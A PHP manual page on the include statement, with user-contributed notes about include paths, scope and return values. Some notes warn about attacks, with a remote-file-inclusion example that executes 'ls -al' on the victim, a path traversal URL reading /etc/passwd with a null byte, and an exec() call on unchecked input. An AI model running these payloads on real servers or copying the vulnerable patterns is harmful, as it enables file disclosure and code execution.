PHP 7.0.6 Released

include

(PHP 4, PHP 5, PHP 7)

The include statement includes and evaluates the specified file.

The documentation below also applies to require.

Files are included based on the file path given or, if none is given, the include_path specified. If the file isn't found in the include_path, include will finally check in the calling script's own directory and the current working directory before failing. The include construct will emit a warning if it cannot find a file; this is different behavior from require, which will emit a fatal error.

If a path is defined — whether absolute (starting with a drive letter or \ on Windows, or / on Unix/Linux systems) or relative to the current directory (starting with . or ..) — the include_path will be ignored altogether. For example, if a filename begins with ../, the parser will look in the parent directory to find the requested file.

For more information on how PHP handles including files and the include path, see the documentation for include_path.

When a file is included, the code it contains inherits the variable scope of the line on which the include occurs. Any variables available at that line in the calling file will be available within the called file, from that point forward. However, all functions and classes defined in the included file have the global scope.

Example #1 Basic include example

vars.php
<?php

$color 
'green';
$fruit 'apple';

?>

test.php
<?php

echo "A $color $fruit"// A

include 'vars.php';

echo 
"A $color $fruit"// A green apple

?>

If the include occurs inside a function within the calling file, then all of the code contained in the called file will behave as though it had been defined inside that function. So, it will follow the variable scope of that function. An exception to this rule are magic constants which are evaluated by the parser before the include occurs.

Example #2 Including within functions

<?php

function foo()
{
    global 
$color;

    include 
'vars.php';

    echo 
"A $color $fruit";
}

/* vars.php is in the scope of foo() so     *
* $fruit is NOT available outside of this  *
* scope.  $color is because we declared it *
* as global.                               */

foo();                    // A green apple
echo "A $color $fruit";   // A green

?>

When a file is included, parsing drops out of PHP mode and into HTML mode at the beginning of the target file, and resumes again at the end. For this reason, any code inside the target file which should be executed as PHP code must be enclosed within valid PHP start and end tags.

If "URL include wrappers" are enabled in PHP, you can specify the file to be included using a URL (via HTTP or other supported wrapper - see Supported Protocols and Wrappers for a list of protocols) instead of a local pathname. If the target server interprets the target file as PHP code, variables may be passed to the included file using a URL request string as used with HTTP GET. This is not strictly speaking the same thing as including the file and having it inherit the parent file's variable scope; the script is actually being run on the remote server and the result is then being included into the local script.

Example #3 include through HTTP

<?php

/* This example assumes that www.example.com is configured to parse .php
* files and not .txt files. Also, 'Works' here means that the variables
* $foo and $bar are available within the included file. */

// Won't work; file.txt wasn't handled by www.example.com as PHP
include 'http://www.example.com/file.txt?foo=1&bar=2';

// Won't work; looks for a file named 'file.php?foo=1&bar=2' on the
// local filesystem.
include 'file.php?foo=1&bar=2';

// Works.
include 'http://www.example.com/file.php?foo=1&bar=2';

$foo 1;
$bar 2;
include 
'file.txt';  // Works.
include 'file.php';  // Works.

?>

Warning

Security warning

Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.

See also Remote files, fopen() and file() for related information.

Handling Returns: include returns FALSE on failure and raises a warning. Successful includes, unless overridden by the included file, return 1. It is possible to execute a return statement inside an included file in order to terminate processing in that file and return to the script which called it. Also, it's possible to return values from included files. You can take the value of the include call as you would for a normal function. This is not, however, possible when including remote files unless the output of the remote file has valid PHP start and end tags (as with any local file). You can declare the needed variables within those tags and they will be introduced at whichever point the file was included.

Because include is a special language construct, parentheses are not needed around its argument. Take care when comparing return value.

Example #4 Comparing return value of include

<?php
// won't work, evaluated as include(('vars.php') == TRUE), i.e. include('')
if (include('vars.php') == TRUE) {
    echo 
'OK';
}

// works
if ((include 'vars.php') == TRUE) {
    echo 
'OK';
}
?>

Example #5 include and the return statement

return.php
<?php

$var 
'PHP';

return 
$var;

?>

noreturn.php
<?php

$var 
'PHP';

?>

testreturns.php
<?php

$foo 
= include 'return.php';

echo 
$foo// prints 'PHP'

$bar = include 'noreturn.php';

echo 
$bar// prints 1

?>

$bar is the value 1 because the include was successful. Notice the difference between the above examples. The first uses return within the included file while the other does not. If the file can't be included, FALSE is returned and E_WARNING is issued.

If there are functions defined in the included file, they can be used in the main file independent if they are before return or after. If the file is included twice, PHP 5 issues fatal error because functions were already declared, while PHP 4 doesn't complain about functions defined after return. It is recommended to use include_once instead of checking if the file was already included and conditionally return inside the included file.

Another way to "include" a PHP file into a variable is to capture the output by using the Output Control Functions with include. For example:

Example #6 Using output buffering to include a PHP file into a string

<?php
$string 
get_include_contents('somefile.php');

function 
get_include_contents($filename) {
    if (
is_file($filename)) {
        
ob_start();
        include 
$filename;
        return 
ob_get_clean();
    }
    return 
false;
}

?>

In order to automatically include files within scripts, see also the auto_prepend_file and auto_append_file configuration options in php.ini.

Note: Because this is a language construct and not a function, it cannot be called using variable functions.

See also require, require_once, include_once, get_included_files(), readfile(), virtual(), and include_path.

User Contributed Notes

snowyurik at gmail dot com
7 years ago
This might be useful:
<?php
include $_SERVER['DOCUMENT_ROOT']."/lib/sample.lib.php";
?>
So you can move script anywhere in web-project tree without changes.
Anon
4 years ago
I cannot emphasize enough knowing the active working directory. Find it by: echo getcwd();
Remember that if file A includes file B, and B includes file C; the include path in B should take into account that A, not B, is the active working directory.
error17191 at gmail dot com
7 months ago
When including a file using its name directly without specifying we are talking about the current working directory, i.e. saying (include "file") instead of ( include "./file") . PHP will search first in the current working directory (given by getcwd() ) , then next searches for it in the directory of the script being executed (given by __dir__).
This is an example to demonstrate the situation :
We have two directory structure :
-dir1
----script.php
----test
----dir1_test
-dir2
----test
----dir2_test

dir1/test contains the following text :
This is test in dir1
dir2/test contains the following text:
This is test in dir2
dir1_test contains the following text:
This is dir1_test
dir2_test contains the following text:
This is dir2_test

script.php contains the following code:
<?php

echo 'Directory of the current calling script: ' . __DIR__;
echo
'<br />';
echo
'Current working directory: ' . getcwd();
echo
'<br />';
echo
'including "test" ...';
echo
'<br />';
include
'test';
echo
'<br />';
echo
'Changing current working directory to dir2';
chdir('../dir2');
echo
'<br />';
echo
'Directory of the current calling script: ' . __DIR__;
echo
'<br />';
echo
'Current working directory: ' . getcwd();
echo
'<br />';
echo
'including "test" ...';
echo
'<br />';
include
'test';
echo
'<br />';
echo
'including "dir2_test" ...';
echo
'<br />';
include
'dir2_test';
echo
'<br />';
echo
'including "dir1_test" ...';
echo
'<br />';
include
'dir1_test';
echo
'<br />';
echo
'including "./dir1_test" ...';
echo
'<br />';
(@include
'./dir1_test') or die('couldn\'t include this file ');
?>
The output of executing script.php is :

Directory of the current calling script: C:\dev\www\php_experiments\working_directory\example2\dir1
Current working directory: C:\dev\www\php_experiments\working_directory\example2\dir1
including "test" ...
This is test in dir1
Changing current working directory to dir2
Directory of the current calling script: C:\dev\www\php_experiments\working_directory\example2\dir1
Current working directory: C:\dev\www\php_experiments\working_directory\example2\dir2
including "test" ...
This is test in dir2
including "dir2_test" ...
This is dir2_test
including "dir1_test" ...
This is dir1_test
including "./dir1_test" ...
couldn't include this file
Rick Garcia
7 years ago
As a rule of thumb, never include files using relative paths. To do this efficiently, you can define constants as follows:

----
<?php // prepend.php - autoprepended at the top of your tree
define('MAINDIR',dirname(__FILE__) . '/');
define('DL_DIR',MAINDIR . 'downloads/');
define('LIB_DIR',MAINDIR . 'lib/');
?>
----

and so on. This way, the files in your framework will only have to issue statements such as this:

<?php
require_once(LIB_DIR . 'excel_functions.php');
?>

This also frees you from having to check the include path each time you do an include.

If you're running scripts from below your main web directory, put a prepend.php file in each subdirectory:

--
<?php
include(dirname(dirname(__FILE__)) . '/prepend.php');
?>
--

This way, the prepend.php at the top always gets executed and you'll have no path handling headaches. Just remember to set the auto_prepend_file directive on your .htaccess files for each subdirectory where you have web-accessible scripts.
Rash
1 year ago
If you want to have include files, but do not want them to be accessible directly from the client side, please, please, for the love of keyboard, do not do this:

<?php

# index.php
define('what', 'ever');
include
'includeFile.php';

# includeFile.php

// check if what is defined and die if not

?>

The reason you should not do this is because there is a better option available. Move the includeFile(s) out of the document root of your project. So if the document root of your project is at "/usr/share/nginx/html", keep the include files in "/usr/share/nginx/src".

<?php

# index.php (in document root (/usr/share/nginx/html))

include __DIR__ . '/../src/includeFile.php';

?>

Since user can't type 'your.site/../src/includeFile.php', your includeFile(s) would not be accessible to the user directly.
Wade.
7 years ago
If you're doing a lot of dynamic/computed includes (>100, say), then you may well want to know this performance comparison: if the target file doesn't exist, then an @include() is *ten* *times* *slower* than prefixing it with a file_exists() check. (This will be important if the file will only occasionally exist - e.g. a dev environment has it, but a prod one doesn't.)

Wade.
php_notes (at) megaphone . ch
8 years ago
If you use php >5.2, don't forget to set up the allow_url_include parameter in php.ini file .. If not you can search a long long long long time after this like-a-bug problem ;)

http://www.php.net/manual/en/ini.php
sPlayer
5 years ago
Sometimes it will be usefull to include a string as a filename

<?php

//get content
$cFile = file_get_contents('crypted.file');
//decrypt the content
$content = decrypte($cFile);

//include this
include("data://text/plain;base64,".base64_encode($content));
//or
include("data://text/plain,".urlencode($content));
?>
Ray.Paseur often uses Gmail
1 year ago
It's worth noting that PHP provides an OS-context aware constant called DIRECTORY_SEPARATOR.  If you use that instead of slashes in your directory paths your scripts will be correct whether you use *NIX or (shudder) Windows.  (In a semi-related way, there is a smart end-of-line character, PHP_EOL)

Example:
<?php
$cfg_path
= 'includes'
. DIRECTORY_SEPARATOR
. 'config.php'
;
require_once(
$cfg_path);
casey at seangroup dot com
2 years ago
Include function,utilizing extract and compact to post variables to and return from an include file (great for configurations, ex: DB connection info, or whatever else you can imagine).

<?php
# include function allowing variables to be posted to and returned from the target script
   
function inc( $__path, $__return='.', array $__post=array() ) {
   
# post var's to the local scope
       
if ( count( $__post ) )
           
extract($__post, EXTR_SKIP);
   
# include the file and store the result
       
if ( $__result = include $__path ) {
       
# return requested variables from the included file
           
if ( is_array($__return) )
               
$result = compact($__return);
       
# Return ALL variables defined from within the included file
        # NOTE: $__post keys are NOT included!
           
else if ( $__return == '.' )
               
$result = compact( array_diff( array_keys(get_defined_vars()),
                    array(
'GLOBALS', '__path', '__return', '__post', '__result')
                    +
array_keys($__post) ) );
       
# Is $__return a variable from the file?
           
else if ( $__return && isset($$__return) )
               
$result = array( $__return => $$__return );
            else
               
$result = array();
       
# unshift the include result into $result
           
array_unshift($result, $__result);
            return
$result;
        }
        return array(
$__result);
    }
?>

-------------------------------------------
www.show-ip.org
Chris Bell
6 years ago
A word of warning about lazy HTTP includes - they can break your server.

If you are including a file from your own site, do not use a URL however easy or tempting that may be. If all of your PHP processes are tied up with the pages making the request, there are no processes available to serve the include. The original requests will sit there tying up all your resources and eventually time out.

Use file references wherever possible. This caused us a considerable amount of grief (Zend/IIS) before I tracked the problem down.
Anonymous
6 years ago
I was having problems when HTTP headers were being sent before I was ready.  I discovered that this happened only when I was including a file at the top of my script.  Since my included file only contained PHP with no whitespace outside the tags, this behavior seemed incorrect.

The editor I was using was saving the files in UTF8 format, sometimes including the redundant Byte Order Mark at the beginning of the file.  Any Unicode-aware editor would implicitly hide the presence of the BOM from the user, making it hard to notice the problem.  However, by using a hex editor I was able to see and remove the three bytes, restoring normal behavior.

Moral:  Prevent your editor from adding an invisible Unicode Byte Order Mark to the beginning of your source code!
thedanevans at gmail dot com
7 years ago
Linking to CSS/JavaScript resources through an included file has bugged me for a long time because if I have a directory structure like:
/www
    index.php
    /sub_dir
        index.php
    /includes
        header.php
    /style
        main.css

where both index.php files include header.php and the header.php file includes something like:

<link rel="stylesheet" type="text/css" href="style/main.css">

This will be included for /index.php but not for /sub_dir/index.php. I read through a few different ways to use relative includes but those are generally meant for the php include function not the HTML <link>. I didn't really love the idea of a new function that I would pass both the filename and a '../' string into which it could use in the href. I also didn't want to just use /style/main.css because in development it is not hosted in my root directory. Although I could change my configuration or my include_path I really just wanted to find a way for PHP to figure out the relative path for me. I finally found a solution that met my needs and here it is:

<?php
    $include_dist
= substr_count(dirname(__FILE__), DIRECTORY_SEPARATOR);
   
$calling_dist = substr_count(dirname($_SERVER['SCRIPT_FILENAME']), DIRECTORY_SEPARATOR);
?>
<link rel="stylesheet" type="text/css" href="<?=str_repeat('../', $calling_dist - $include_dist + 1)?>style/main.css">

In this case I added one to the difference to account for the fact that the include is one directory away from the base. This also means that str_repeat won't be passed a negative value, which would cause an error. dirname(__FILE__) gets the directory of the file being included while dirname($_SERVER['SCRIPT_FILENAME']) gets the directory of the file including it. The script simply finds the difference in how far off the base directory the two are and prints the appropriate number of '../' before the URL.

NOTE: dirname(__FILE__) can be replaced by __DIR__ in PHP greater than or equal to 5.3.0
anonymous
9 years ago
When I'm dealing with a package that uses relative includes of its own, rather than modify all of their includes, I found it was easier to change PHP's working directory before and after the include, like so:

<?php
$wd_was
= getcwd();
chdir("/path/to/included/app");
include(
"mainfile.php");
chdir($wd_was);
?>

This way neither my includes nor theirs are affected; they all work as expected.
durkboek A_T hotmail D_O_T com
11 years ago
I would like to emphasize the danger of remote includes. For example:
Suppose, we have a server A with Linux and PHP 4.3.0 or greater installed which has the file index.php with the following code:

<?php
// File: index.php
include ($_GET['id'].".php");
?>

This is, of course, not a very good way to program, but i actually found a program doing this.

Then, we hava a server B, also Linux with PHP installed, that has the file list.php with the following code:

<?php
// File: list.php
$output = "";
exec("ls -al",$output);
foreach(
$output as $line) {
echo
$line . "<br>\n";
}
?>

If index.php on Server A is called like this: http://server_a/index.php?id=http://server_b/list
then Server B will execute list.php and Server A will include the output of Server B, a list of files.

But here's the trick: if Server B doesn't have PHP installed, it returns the file list.php to Server A, and Server A executes that file. Now we have a file listing of Server A!
I tried this on three different servers, and it allways worked.
This is only an example, but there have been hacks uploading files to servers etc.

So, allways be extremely carefull with remote includes.
redeye at cs-aktuell dot de
13 years ago
As to the security risks of an include statement like:

<?php
 
include($page);
?>

This is a really bad way on writing an include statement because the user could include server- or password-files which PHP can read as well. You could check the $page variable first but a simple check like

<?php
 
if ( file_exists($page) ) AND !preg_match("#^\.\./#",$page) )
    include(
$page);
?>

wont make it any safer. ( Think of $page = 'pages/../../../etc/passwd' )

To be sure only pages are called you want the user to call use something like this:

<?php
  $path
= 'pages/';
 
$extension = '.php';
 
  if (
preg_match("#^[a-z0-9_]+$#i",$page) ){
   
$filename = $path.$page.$extension;
    include(
$filename);
  }
?>

This will only make sure only files from the directory $path are called if they have the fileextension $extension.
morris.php <A T> it-solutions.org
11 years ago
Something not previously stated here - but found elsewhere - is that if a file is included using a URL and it has a '.php' extension - the file is parsed by php - not just included as it would be if it were linked to locally.

This means the functions and (more importantly) classes included will NOT work.

for example:

<?php
include "http://example.com/MyInclude.php";
?>

would not give you access to any classes or functions within the MyInclude.php file.

to get access to the functions or classes you need to include the file with a different extension - such as '.inc' This way the php interpreter will not 'get in the way' and the text will be included normally.
uramihsayibok, gmail, com
8 years ago
I have a need to include a lot of files, all of which are contained in one directory. Support for things like <?php include_once 'dir/*.php'; ?> would be nice, but it doesn't exist.

Therefore I wrote this quick function (located in a file automatically included by auto_prepend_file):
<?php

function include_all_once ($pattern) {
    foreach (
glob($pattern) as $file) { // remember the { and } are necessary!
       
include $file;
    }
}

// used like
include_all_once('dir/*.php');

?>
A fairly obvious solution. It doesn't deal with relative file paths though; you still have to do that yourself.
emanueledelgrande ad email dot it
5 years ago
About the problem to include a script in the global scope, after many tests with different solutions, I reached my point. I post it in the hope it may be useful.

At first I built my "globalScopeSimulator" class, but an include called inside a class is not the best solution: if it contains some user code, the user will access to the $this reserved variable and even to all the private members... Critical issue!

That's why I turned back into a function solution.

Another advantage is that I didn't have to make use of the deprecable "global" keyword, since I *imported* the global scope inside the function, with the extract() function.
Using the EXTR_REFS flag this trick does not waste memory, since the extracted variables are not a copy, but a reference to the global ones.

<?php
function global_include($script_path) {
   
// check if the file to include exists:
   
if (isset($script_path) && is_file($script_path)) {
       
// extract variables from the global scope:
       
extract($GLOBALS, EXTR_REFS);
       
ob_start();
        include(
$script_path);
        return
ob_get_clean();
    } else {
       
ob_clean();
       
trigger_error('The script to parse in the global scope was not found');
    }
}
?>

Hope it helps... :)
Cheers and happy coding!
mbread at m-bread dot com
9 years ago
If you have a problem with "Permission denied" errors (or other permissions problems) when including files, check:

1) That the file you are trying to include has the appropriate "r" (read) permission set, and
2) That all the directories that are ancestors of the included file, but not of the script including the file, have the appropriate "x" (execute/search) permission set.
vahe dot ayvazyan at googlemail dot com
9 years ago
If you want the "include" function to work correctly with paths and GET parameters, try the following code:

<?php
    $_GET
['param1'] = 'param1value';
   
$_GET['param2'] = 'param2value';
    @include(
$_SERVER['DOCUMENT_ROOT'] . "/path1/path2/include.php");
?>

Then within your "include.php" use $_GET['param1'] and $_GET['param2'] to access values of parameters.

I spent several hours to figure this out.
phpbypass at digitallyhazardous dot com
2 years ago
You can use include in echo short tags.  To avoid include echoing '1' when you don't need it, simply add an empty string and a demiter to the beginning of the statement.

Example : <?='';include('foobar.php')?>
daevid at daevid dot com
6 years ago
Well now, I am confused because these pages all show them as functions:
Include(), require(), require_once(), include_once()

Yet ALL of the examples show the PEAR way:
http://pear.php.net/manual/en/standards.including.php

"Note: include_once and require_once are statements, not functions. Parentheses should not surround the subject filename."

    include_once "a.php";

To change all require_once('foo.php'); to require_once 'foo.php' execute this:

cd /var/www/

find . -name '*.php' -print | xargs egrep -l \
'require_once\s*(\(.*\));'\ | xargs sed -i.sedorig -e \
's/require_once\s*(\(.*\));/require_once \1;/'

(thanks to Robert Hajime Lanning for that)

Then to remove all the ".php.sedorig" backup files execute this:

find . -name "*.php.sedorig" -type f -exec rm -rf {} \;
hyponiq at gmail dot com
6 years ago
I would like to point out the difference in behavior in IIS/Windows and Apache/Unix (not sure about any others, but I would think that any server under Windows will be have the same as IIS/Windows and any server under Unix will behave the same as Apache/Unix) when it comes to path specified for included files.

Consider the following:
<?php
include '/Path/To/File.php';
?>

In IIS/Windows, the file is looked for at the root of the virtual host (we'll say C:\Server\Sites\MySite) since the path began with a forward slash.  This behavior works in HTML under all platforms because browsers interpret the / as the root of the server.

However, Unix file/folder structuring is a little different.  The / represents the root of the hard drive or current hard drive partition.  In other words, it would basically be looking for root:/Path/To/File.php instead of serverRoot:/Path/To/File.php (which we'll say is /usr/var/www/htdocs).  Thusly, an error/warning would be thrown because the path doesn't exist in the root path.

I just thought I'd mention that.  It will definitely save some trouble for those users who work under Windows and transport their applications to an Unix-based server.

A work around would be something like:
<?php
$documentRoot
= null;

if (isset(
$_SERVER['DOCUMENT_ROOT'])) {
   
$documentRoot = $_SERVER['DOCUMENT_ROOT'];
   
    if (
strstr($documentRoot, '/') || strstr($documentRoot, '\\')) {
        if (
strstr($documentRoot, '/')) {
           
$documentRoot = str_replace('/', DIRECTORY_SEPARATOR, $documentRoot);
        }
        elseif (
strstr($documentRoot, '\\')) {
           
$documentRoot = str_replace('\\', DIRECTORY_SEPARATOR, $documentRoot);
        }
    }
   
    if (
preg_match('/[^\\/]{1}\\[^\\/]{1}/', $documentRoot)) {
       
$documentRoot = preg_replace('/([^\\/]{1})\\([^\\/]{1})/', '\\1DIR_SEP\\2', $documentRoot);
       
$documentRoot = str_replace('DIR_SEP', '\\\\', $documentRoot);
    }
}
else {
   
/**
     * I usually store this file in the Includes folder at the root of my
     * virtual host. This can be changed to wherever you store this file.
     *
     * Example:
     * If you store this file in the Application/Settings/DocRoot folder at the
     * base of your site, you would change this array to include each of those
     * folders.
     *
     * <code>
     * $directories = array(
     *     'Application',
     *     'Settings',
     *     'DocRoot'
     * );
     * </code>
     */
   
$directories = array(
       
'Includes'
   
);
   
    if (
defined('__DIR__')) {
       
$currentDirectory = __DIR__;
    }
    else {
       
$currentDirectory = dirname(__FILE__);
    }
   
   
$currentDirectory = rtrim($currentDirectory, DIRECTORY_SEPARATOR);
   
$currentDirectory = $currentDirectory . DIRECTORY_SEPARATOR;
   
    foreach (
$directories as $directory) {
       
$currentDirectory = str_replace(
           
DIRECTORY_SEPARATOR . $directory . DIRECTORY_SEPARATOR,
           
DIRECTORY_SEPARATOR,
           
$currentDirectory
       
);
    }
   
   
$currentDirectory = rtrim($currentDirectory, DIRECTORY_SEPARATOR);
}

define('SERVER_DOC_ROOT', $documentRoot);
?>

Using this file, you can include files using the defined SERVER_DOC_ROOT constant and each file included that way will be included from the correct location and no errors/warnings will be thrown.

Example:
<?php
include SERVER_DOC_ROOT . '/Path/To/File.php';
?>
joe dot naylor at gmail dot com
5 years ago
Be very careful with including files based on user inputed data.  For instance, consider this code sample:

index.php:
<?php
$page
= $_GET['page'];
if (
file_exists('pages/'.$page.'.php'))
{
   include(
'pages/'.$page.'.php');
}
?>

Then go to URL:
index.php?page=/../../../../../../etc/passwd%00.html

file_exists() will return true, your passwd file will be included and since it's not php code it will be output directly to the browser.

Of course the same vulnerability exists if you are reading a file to display, as in a templating engine.

You absolutely have to sanitize any input string that will be used to access the filesystem, you can't count on an absolute path or appended file extension to secure it.  Better yet, know exactly what options you can accept and accept only those options.
Ethilien
10 years ago
Another way of getting the proper include path relative to the current file, rather than the working directory is:

<?php
include realpath(dirname(__FILE__) . "/" . "relative_path");
?>
oasis1 at geocities dot com
8 years ago
What a pain! I have struggled with including files from various subdirectories.  My server doesn't support an easy way to get to the root HTML directory so this is what I came up with:

<?php

$times
= substr_count($_SERVER['PHP_SELF'],"/");
$rootaccess = "";
$i = 1;

while (
$i < $times) {
$rootaccess .= "../";
$i++;
}
include (
$rootaccess."foo/bar.php");

?>

This will give you what it takes to get to the root directory, regardless of how many subdirectories you have traveled  through.
abanarn at gmail dot com
1 year ago
To Windows coders, if you are upgrading from 5.3 to 5.4 or even 5.5; if you have have coded a path in your require or include you will have to be careful. Your code might not be backward compatible. To be more specific; the code escape for ESC, which is "\e" was introduced in php 5.4.4 + but if you use 5.4.3 you should be fine. For instance:

Test script:
-------------
<?php
require("C:\element\scripts\include.php");
?>

In php 5.3.* to php 5.4.3
----------------------------
If you use require("C:\element\scripts\include.php")  it will work fine.

If php 5.4.4 + It will break.
------------------------------
Warning: require(C:←lement\scripts\include.php): failed to open stream: In
valid argument in C:\element\scripts\include.php on line 20

Fatal error: require(): Failed opening required 'C:←lement\scripts\include.php

Solution:
-----------
Theoretically, you should be always using "\\" instead of "\" when you write php in windows machine OR use "/" like in Linux and you should fine since "\" is an escape character in most programming languages.
If you are not using absolute paths ; stream functions is your best friend like stream_resolve_include_path() , but you need to include the path you are resolving in you php.ini (include_path variable).

I hope this makes sense and I hope it will someone sometime down the road.
cheers,
brett dot jr dot alton at gmail dot com
3 years ago
You need to test to see if include() is equal to 1 to see if it's successful. For some reason it tests success instead of failure.

So to test if the include failed, you need to test like this:

<?php
if ((include 'inc/db.php') !== 1)
{
    die(
'Include failed.');
}
?>

The docs say to test against 'OK', which is incorrect, as the return value is int(1);
Jero Minh
1 year ago
Notice that using @include (instead of include without @) will set the local value of error_reporting to 0 inside the included script.

Consider the following:
<?php
    ini_set
('error_reporting', E_ALL);

    echo
"Own value before: ";
    echo
ini_get('error_reporting');
    echo
"\r\n";

    echo
"include foo.php: ";
    include(
'foo.php');

    echo
"@include foo.php: ";
    @include(
'foo.php');

    echo
"Own value now: " . ini_get('error_reporting');
?>

foo.php
<?php
   
echo ini_get('error_reporting') . "\r\n";
?>

Output:
    Own value before: 32767
    include foo.php: 32767
    @include foo.php: 0
    Own value now: 32767
example at user dot com
7 years ago
Just about any file type can be 'included' or 'required'.  By sending appropriate headers, like in the below example, the client would normally see the output in their browser as an image or other intended mime type.

You can also embed text in the output, like in the example below.  But an image is still an image to the client's machine.  The client must open the downloaded file as plain/text to see what you embedded.

<?php

header
('Content-type: image/jpeg');
header('Content-Disposition: inline;');

include
'/some_image.jpg';
echo
'This file was provided by example@user.com.';

?>

Which brings us to a major security issue.  Scripts can be hidden within images or files using this method.  For example, instead echoing "<?php phpinfo(); ?>", a foreach/unlink loop through the entire filesystem, or some other method of disabling security on your machine.

'Including' any file made this way will execute those scripts.  NEVER 'include' anything that you found on the web or that users upload or can alter in any way.  Instead, use something a little safer to display the found file, like "echo file_get_contents('/some_image.jpg');"
medhefgo at googlemail dot com
9 years ago
Because there is no quick way to check if a file is in include_path, I've made this function:

<?php

function is_includeable($filename, $returnpaths = false) {
   
$include_paths = explode(PATH_SEPARATOR, ini_get('include_path'));

    foreach (
$include_paths as $path) {
       
$include = $path.DIRECTORY_SEPARATOR.$filename;
        if (
is_file($include) && is_readable($include)) {
            if (
$returnpaths == true) {
               
$includable_paths[] = $path;
            } else {
                return
true;
            }
        }
    }

    return (isset(
$includeable_paths) && $returnpaths == true) ? $includeable_paths : false;
}

?>
gillis dot php at TAKETHISAWAY dot gillis dot fi
11 years ago
This is not directly linked to the include function itself. But i had a problem with dynamically generated include-files that could generate parse errors and cause the whole script to parse-error.

So as i could not find any ready solution for this problem i wrote the mini-function. It's not the most handsome solution, but it works for me.

<?php
function ChkInc($file){
   if(
substr(exec("php -l $file"), 0, 28) == "No syntax errors detected in"){
   return
true;
   }else{
   return
false;
   }
}
?>

if someone else has a better solution, do post it...

Note. remember that this function uses unchecked variables passed to exec, so don't use it for direct user input without improving it.

//Gillis Danielsen
ignacio esviza
10 years ago
Hi, there...

I've use this in order to grab the output from an include() but without sending it to the buffer.

Headers are not sent neither.

<?php
function include2($file){
   
   
$buffer = ob_get_contents();
    include
$file;
   
$output = substr(ob_get_contents(),strlen($buffer));
   
ob_end_clean();
   
   
ob_start();
    echo
$buffer;
   
    return
$output;
   
}
?>
james at gogo dot co dot nz
12 years ago
While you can return a value from an included file, and receive the value as you would expect, you do not seem to be able to return a reference in any way (except in array, references are always preserved in arrays).

For example, we have two files, file 1.php contains...
<?php
 
function &x(&$y)
  {
    return include(
dirname(__FILE__) . '/2.php');
  }

 
$z = "FOO\n";
 
$z2 = &x($z);

  echo
$z2;
 
$z  = "NOO\n";
 
  echo
$z2;
?>

and file 2.php contains...
<?php  return $y; ?>

calling 1.php will produce

FOO
FOO

i.e the reference passed to x() is broken on it's way out of the include()

Neither can you do something like <?php $foo =& include(....); ?> as that's a parse error (include is not a real function, so can't take a reference in that case).  And you also can't do <?php return &$foo ?> in the included file (parse error again, nothing to assign the reference too).

The only solutions are to set a variable with the reference which the including code can then return itself, or return an array with the reference inside.

---
James Sleeman
http://www.gogo.co.nz/
johan
7 years ago
If you wish to abstract away include calls inside functions, or programmatically juggle files to include using functions, just remember:

1. Declare any variables as global if you want those variables "included" in the global scope (ie. if they are used outside the file).

2. Functions are naturally global, so files that only contain functions (libs, sets of api's what have you) can be included anywhere.

eg.

<?php
function nav($i){
  include
"nav$i.php";
}

nav(1);

// same as...
include "nav1.php";
// ...as long as variables are global
?>

So don't feel you can only include/require at the beginning of files, or outside/before functions. You can totally program any sophisticated include behavior.
Cory Gagliardi
8 years ago
Easy way to set $_GET values for local includes.

This is an easy way to make up fake URLs for SEO purposes that are really just running other PHP pages with special $_GET values.

This will NOT work:
<?PHP
include('communities.php?show=gated&where=naples');
?>

However, this will:
<?PHP
$_GET
= array();
$_GET['show'] = 'gated';
$_GET['where'] = 'naples';
include(
'communities.php');
?>

Putting this on your page and nothing else will give the same result as going to
'communities.php?show=gated&where=naples'
but the URL can be whatever you want it to be.
moosh at php dot net
12 years ago
<?php
@include('/foo') OR die ("bar"); # <- Won't work
@(include('/foo')) OR die ("bar"); # <- Works
?>

so "or" have prority on "include"
ricardo dot ferro at gmail dot com
7 years ago
Two functions to help:

<?php

function add_include_path ($path)
{
    foreach (
func_get_args() AS $path)
    {
        if (!
file_exists($path) OR (file_exists($path) && filetype($path) !== 'dir'))
        {
           
trigger_error("Include path '{$path}' not exists", E_USER_WARNING);
            continue;
        }
       
       
$paths = explode(PATH_SEPARATOR, get_include_path());
       
        if (
array_search($path, $paths) === false)
           
array_push($paths, $path);
       
       
set_include_path(implode(PATH_SEPARATOR, $paths));
    }
}

function
remove_include_path ($path)
{
    foreach (
func_get_args() AS $path)
    {
       
$paths = explode(PATH_SEPARATOR, get_include_path());
       
        if ((
$k = array_search($path, $paths)) !== false)
            unset(
$paths[$k]);
        else
            continue;
       
        if (!
count($paths))
        {
           
trigger_error("Include path '{$path}' can not be removed because it is the only", E_USER_NOTICE);
            continue;
        }
       
       
set_include_path(implode(PATH_SEPARATOR, $paths));
    }
}

?>
dragon at wastelands dot net
11 years ago
The __FILE__ macro will give the full path and name of an included script when called from inside the script.  E.g.

<?php include("/different/root/script.php"); ?>

And this file contains:
<?php echo __FILE__; ?>

The output is:
/different/root/script.php

Surprisingly useful :>  Obviously something like dirname(__FILE__) works just fine.
mattcimino at gardiners dot com
11 years ago
To avoid painfully SLOW INCLUDES under IIS be sure to set "output_buffering = on" in php.ini. File includes dropped from about 2 seconds to 0 seconds when this was set.
alex carstea
8 years ago
Since include() caused me many problems when i was trying to test my code, I wrote a small function. It receives as parameter the path to the file to include relative to the current file. The format similar to :
       "../../path/FileName.php"
The function returns the absolute path to the file to be included. This path can be used as argument to include() and resolves the problem of nested inclusions.
<?php
function getFilePath($relativePath){
    
$absPath=dirname($_SERVER['SCRIPT_FILENAME']);
    
    
$relativeArray=explode("/",$relativePath);
    
$absArray=explode("/",$absPath);
    
$upTokens=0;
    
//count the number of ".." tokens that precede the path
    
while(( $upTokens<count($relativeArray)) and ($relativeArray[$upTokens]=="..")) {
        
$upTokens++;
     }
    
// create the absolute path    
    
$filePath=$absArray[0];
     for (
$i=1; $i< (count($absArray)-$upTokens);$i++) {
        
$filePath.="/".$absArray[$i];
     }
    
     for (
$i=$upTokens; $i< count($relativeArray);$i++){
        
$filePath.="/".$relativeArray[$i];
     }
     return
$filePath;
}
?>
  Hope you will find it usefull....

  Alex
cavarlier [at] hotmail [dot] com
10 years ago
please note when you include a (utf-8) encoded file, this will be sufficient to send headers even if it doesnt contain any line breaks
-hh-
9 years ago
coldflame,
<?=$foo?> equals <? print $foo ?>
If 1 is not needed at the end, just use <? include($filename) ?> without the equal sign.
mlindal at pfc dot forestry dot ca
9 years ago
If a person directly accesses an include file by mistake, you may want to forward them to a correct default page.

Do this by:

Say the file to be included is 'newpubs.php'

